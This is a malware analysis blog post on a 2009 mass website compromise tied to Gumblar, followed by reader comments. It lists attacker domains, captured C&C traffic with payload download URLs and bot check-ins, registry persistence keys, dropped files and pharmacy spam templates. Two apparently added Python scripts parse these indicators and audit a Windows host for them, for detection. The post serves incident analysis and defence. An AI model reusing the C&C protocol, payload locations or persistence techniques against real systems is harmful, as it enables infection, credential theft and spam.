Nine-Ball = Gumblar Redux? – 40,000 websites compromised
My RSS reader alerted me today to another wave of mass website compromises from Websense. Hungry for more information, I decided to dig in to reveal the details that, as always, have been left out.
Summary
This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:
Install a socks proxy
Install fake AV (System Security)
Steal FTP credentials
Send SPAM
Redirect search queries
What’s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I’m not 100% sure why yet.
Details
Information on Websense's site was sparse, but a quick Google search for the first part of the domain they referenced in their alert yielded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133, which is hosted by Eurohost in Ukraine, a provider I have run across many times before. I'll probably post another article on these guys shortly.
inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA
This IP hosts many other domains associated with the attack:
sovi.tw
rmi.tw
orep.tw
molo.tw
dmr.tw
When connecting to rnw.kz, a series of redirects takes place between the above noted domains. Cookies are created (probably so a victim is only infected once) to track victims and are passed on to the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty Wepawet was not successful in analysing the attack, as it was simply redirected to ask.com.
After using MalZilla to quickly decode the exploit code (discussed in WebSense’s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] [VirusTotal] [Threat Expert].
A VM of mine was infected, and after loading Internet Explorer the malware lit up and did its thing. I've submitted a few files to VT, but to be honest I haven't had much time to investigate, so this doesn't cover everything.
Binary Downloads, Ads and C&C communication
Interesting notes:
User Agent: socks
HTTP server: nginx (commonly used by attackers)
C&C appears to be: trafficshop.tw
Version: 3.15.3
Some of the attacker's SQL is visible: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1
Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:25:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 1822
Content-Type: text/html
#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|——————————————–|<a href="http://www.best-med-shop.com"> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U7:<br>|ADVERTISING|——————————————–|<a href="http://www.best-med-shop.com"> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U?:<br>|ADVERTISING|——————————————–|<a href="http://www.best-med-shop.com"> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U=:FORUM ADVERTISING|——————————————–||[URL=http://www.best-med-shop.com] ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa…. [/url]|||http://www.best-med-shop.com||——————————————–%%
GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1
Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 251
Content-Type: text/html
#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
Array
(
[0] => 200704_socks.exe
[1] => 432128_sever.exe
[2] => 11264_ic.exe
)
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
.crc tmpl.
GET /n1.exe HTTP/1.1
User-Agent: Mozilla
Host: miosmschat.com
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Tue, 16 Jun 2009 23:34:57 GMT
Content-Type: application/octet-stream
Connection: close
Content-Length: 512830
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT
Accept-Ranges: bytes
Other interesting network traffic
GET /in.php?url=5&affid=02800 HTTP/1.1
Referrer: http://greatmarketingservices.com/
Accept: *//*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)
Host: greatmarketingservices.com
Connection: Keep-Alive
Cache-Control: no-cache
POST /socks/gate/r.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 125
Cache-Control: no-cache
s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Content-Type: text/html
iogeelhchqhogmhgggdccnghdqdk
POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 78
Cache-Control: no-cache
CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…ya.ru/5/982
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 93
Cache-Control: no-cache
CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…AAAAAAAACI.050010026000300
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 50
Content-Type: text/html
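The two exchanges above (the /zub/zc.php beacon with its #U-tagged response, and the /socks/gate/ POSTs with the "socks" User-Agent) are simple enough to parse and match in a proxy log or packet capture. The following is an added example of my own, not code from the original post or from the malware's operators: it parses the beacon request, checks it against the indicators visible in the capture, splits the C&C response into payload URLs, ad templates and leaked server-side debug output, and decodes the k= download report. The sample request and response strings are reconstructed from the capture above (the beacon sample adds the "socks" User-Agent header the post notes but the printed capture omits; the ad templates are shortened). Nothing here touches the network.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators lifted from the captured traffic in the post.
SUSPECT_HOSTS = {"trafficshop.tw", "orep.tw", "miosmschat.com"}
SUSPECT_PATHS = ("/zub/zc.php", "/socks/gate/")
SUSPECT_USER_AGENT = "socks"

# Constructed sample: the first beacon from the post, with the "socks"
# User-Agent the post mentions added as a header line.
SAMPLE_BEACON = (
    "GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3"
    "&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1\r\n"
    "User-Agent: socks\r\n"
    "Host: trafficshop.tw\r\n"
)

# Constructed sample: the socks gate check-in from the post.
SAMPLE_GATE = (
    "POST /socks/gate/r.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: socks\r\n"
    "Host: trafficshop.tw\r\n"
    "Content-Length: 125\r\n"
)

# Constructed sample: an ordinary request that should match nothing.
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0\r\nHost: example.com\r\n"

# Constructed sample: the C&C response body format, ad templates shortened.
SAMPLE_RESPONSE = (
    "#U1:http://orep.tw/socks.exe\n"
    "#U1:http://orep.tw/sever.exe\n"
    "#U1:http://orep.tw/ic.exe\n"
    "#U;:<br>|ADVERTISING|<a href=\"http://www.best-med-shop.com\">...</a>|%%\n"
    "#U=:FORUM ADVERTISING|[URL=http://www.best-med-shop.com]...[/url]|%%\n"
    "Array\n(\n    [0] => 200704_socks.exe\n)\n"
    "UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;\n"
)


def parse_request(raw):
    """Split a raw HTTP request head into method, path, query dict and header dict."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if value:
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"method": method, "path": parts.path, "query": query, "headers": headers}


def indicators(req):
    """Return the names of the capture-derived indicators a parsed request matches."""
    hits = []
    if req["headers"].get("user-agent") == SUSPECT_USER_AGENT:
        hits.append("ua_socks")
    if req["headers"].get("host", "") in SUSPECT_HOSTS:
        hits.append("host_known_cc")
    if req["path"].startswith(SUSPECT_PATHS):
        hits.append("path_cc_gate")
    q = req["query"]
    # Beacon shape: a 32-hex-char bot id in d= plus a version string in v=.
    if "v" in q and re.fullmatch(r"[0-9A-F]{32}", q.get("d", "")):
        hits.append("beacon_query_shape")
    return hits


def parse_cc_response(body):
    """Split a #U-tagged response: tag 1 carries download URLs, other tags carry
    ad templates terminated by %%, and any untagged line is server-side output
    (print_r() dumps, SQL) that leaked into the response."""
    result = {"downloads": [], "templates": {}, "leaked": []}
    for line in body.splitlines():
        m = re.match(r"^#U(.):(.*)$", line)
        if m:
            tag, payload = m.groups()
            if tag == "1":
                result["downloads"].append(payload.strip())
            else:
                result["templates"][tag] = payload.rstrip("%")
        elif line.strip():
            result["leaked"].append(line)
    return result


def parse_download_report(k):
    """Decode the k= value ("<size>_<name>,...") the client sends after fetching payloads."""
    items = []
    for entry in k.split(","):
        size, _, name = entry.partition("_")
        items.append((int(size), name))
    return items


if __name__ == "__main__":
    print("beacon:", indicators(parse_request(SAMPLE_BEACON)))
    print("gate:", indicators(parse_request(SAMPLE_GATE)))
    parsed = parse_cc_response(SAMPLE_RESPONSE)
    print("payload URLs:", parsed["downloads"])
    print("leaked server lines:", len(parsed["leaked"]))
    print("report:", parse_download_report("200704_socks.exe,432128_sever.exe,11264_ic.exe"))
```

The "leaked" bucket is worth keeping in a real parser: the print_r() array and the UPDATE statement in the capture are debug output the operators forgot to remove, and the table and column names (`downfiles`, `Dcnt`, `Did`) make for a very specific content signature.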
Files & Reg Keys
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\sever.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: “C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: “C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe”
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: “nvbms”
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: “C:\WINDOWS\system32\npp\ndisnpp.dll”
C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmp
C:\WINDOWS\system32\4311z.sc
C:\WINDOWS\system32\cxilanls
C:\WINDOWS\system32\nh4g.bbv
C:\WINDOWS\system32\nvbms.dll
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sgr3.ge
C:\WINDOWS\system32\SOCKET2.DLL
C:\WINDOWS\system32\SOCKET2w.DLL
C:\WINDOWS\system32\SPORDER.DLL
C:\WINDOWS\system32\user32.DLL
C:\WINDOWS\system32\vrur
C:\WINDOWS\sever.exe
C:\WINDOWS\socks.exe (socks proxy)
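The persistence pattern in the listing above is easy to check for on a suspect box: Run values pointing at an 8-digit folder under All Users\Application Data with a same-named exe, an exe dropped straight into C:\WINDOWS, a populated AppInit_DLLs value, and the sfxzmt-prefixed DLLs. Here is an added audit script of my own, not code from the original post; it scores a set of Run values, the AppInit_DLLs value and a file list against those patterns. The sample registry values and file paths are constructed from the listing above (plus a benign ctfmon.exe entry), and I assume the post's "Appiytt_Dlls" entry refers to the AppInit_DLLs value under the Windows NT\CurrentVersion\Windows key. The live registry reader only runs on Windows; elsewhere the audit works on the constructed samples.

```python
import re
import sys

# Registry locations from the post's listing. The post prints the second key's value
# name as "Appiytt_Dlls"; I assume it is AppInit_DLLs, which Windows loads into
# every process that links user32.dll.
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
APPINIT_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"

KNOWN_BAD_NAMES = {"sever.exe", "socks.exe"}
# Fake AV: an 8-digit folder under All Users\Application Data with a same-named exe.
NUMBERED_DROP = re.compile(r"\\application data\\(\d{8})\\\1\.exe$", re.IGNORECASE)
# Spam/advertising DLLs share the sfxzmt prefix in the post's file list.
SPAM_DLL = re.compile(r"\\system32\\sfxzmt\w*\.dll$", re.IGNORECASE)
# An exe sitting directly in %WINDIR% rather than in a subfolder.
WINDIR_EXE = re.compile(r"^c:\\windows\\[^\\]+\.exe$", re.IGNORECASE)

# Constructed sample mirroring the post's Run values, plus one benign entry.
SAMPLE_RUN_VALUES = {
    "PromoReg": r"C:\WINDOWS\sever.exe",
    "18888124": r"C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe",
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
}
SAMPLE_APPINIT = "nvbms"
SAMPLE_FILES = [
    r"C:\WINDOWS\system32\sfxzmtforum.dll",
    r"C:\WINDOWS\system32\nvbms.dll",
    r"C:\WINDOWS\system32\kernel32.dll",
]


def classify_run_value(name, path):
    """Return why a Run value looks like this campaign's persistence, or None."""
    clean = path.strip('"')
    base = clean.rsplit("\\", 1)[-1].lower()
    if base in KNOWN_BAD_NAMES:
        return "known dropper name"
    if NUMBERED_DROP.search(clean):
        return "fake AV drop: 8-digit folder with matching exe name"
    if name.isdigit() and len(name) == 8:
        return "fake AV: 8-digit Run value name"
    if WINDIR_EXE.match(clean):
        return "exe dropped directly in %WINDIR%"
    return None


def audit(run_values, appinit_dlls, files):
    """Return (location, reason) findings for Run values, AppInit_DLLs and files."""
    findings = []
    for name, path in run_values.items():
        reason = classify_run_value(name, path)
        if reason:
            findings.append((RUN_KEY + "\\" + name, reason))
    if appinit_dlls.strip():
        findings.append((APPINIT_KEY + r"\AppInit_DLLs", "non-empty AppInit_DLLs: " + appinit_dlls))
    for path in files:
        if SPAM_DLL.search(path):
            findings.append((path, "spam/advertising DLL name pattern"))
    return findings


def collect_run_values():
    """Read the live HKLM Run key on Windows; return {} elsewhere so the audit still runs."""
    if sys.platform != "win32":
        return {}
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") as key:
        index = 0
        while True:
            try:
                name, data, _type = winreg.EnumValue(key, index)
            except OSError:
                break
            values[name] = str(data)
            index += 1
    return values


if __name__ == "__main__":
    live = collect_run_values()
    for location, reason in audit(live or SAMPLE_RUN_VALUES, SAMPLE_APPINIT, SAMPLE_FILES):
        print(location, "->", reason)
```

The AppInit_DLLs check is the one I would not skip on a real host: the value is rarely populated on a clean XP box, and the "nvbms" entry here lines up with the nvbms.dll in system32, which is how the injected component gets into every GUI process.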
Other notable behavior
The malware tries to overwrite user32.dll, triggering Windows File Protection. My VM bluescreened a couple of times during analysis, which means victims are probably suffering the same problem. The malware also installs WinPcap and hides its presence by deleting various registry keys and the WinPcap uninstaller.

Hi Andrew.
I'm a Korean malware analyzer.
I tried to download the above URL but my DNS does not resolve that domain name.
So would you please send me a copy of the binaries?
Thanks.
Hi, after reading this I'm absolutely positive that I have this on my computer. It seems to block my antivirus from working.
(I have Trend Micro.) Your website is the only place I've found information on this so far. If you could help me in removing it, or direct me somewhere that can, it would be greatly appreciated.
I have this virus on my computer and was unable to access certain websites. Now whenever I try to open IE 7 to any page, it shows trughtsa.com, sticks there for a while, an Adobe error comes up and then the whole program shuts down. How do I get this off of my computer???? Please help!!!
Well, last time I booted into Windows my desktop background was izohore.bmp and a strange "Anti Virus" software was scanning some files. So it seems like I have got this thing. The problem was that I could not run any app like Firefox or Task Manager since the "AV" "detected an infection", so I quickly shut down my computer and booted into Linux. I mounted the WINDOWS partition and found a strange numbered exe in a strange numbered folder in /all users/Application Data/ and the izohore.bmp in \user\Local Settings\Temp\, but I could not find any other file yet. I used ClamAV to scan this partition but it did not even find the exe in the "app data" folder (since it is not the best choice anyway). It seems like this scareware uses varied names to store its data, but the server.exe and socks.exe should exist I think, and the names do not seem like they vary.
Since the program does not seem to corrupt any random data, I'm going to reboot into Windows and see what I can do there, since I have removed everything I found concerning this virus. Thank you
I have struggled with this malware all weekend. It's called Krap.w and seems to be very new. All Google hits are just hours old. No antivirus company has any news on it. It reinstalls a three-digit exe file every reboot, like 266.exe in the Temporary Internet Files folder, and also a random eight-digit folder in user\temp\, e.g. user\temp\15736234\ where three files are created: 15736234, 15736234.ins and 15736234.exe (same random eight digits). F-Secure's antivirus program now detects and stops it from taking over the system, but does not find the installer yet. Neither have I.